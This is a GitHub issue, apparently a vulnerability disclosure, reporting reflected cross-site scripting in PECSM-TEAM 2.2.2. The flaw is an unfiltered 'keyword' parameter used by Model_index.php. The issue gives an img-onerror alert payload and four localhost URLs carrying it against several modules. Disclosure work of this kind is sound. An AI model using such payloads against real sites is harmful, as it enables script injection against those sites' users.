Skip to content

PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerability #3

Closed
@snappyJack

Description

@snappyJack

I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.
clipboard
now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running
clipbzoard

and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

..
..
..

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions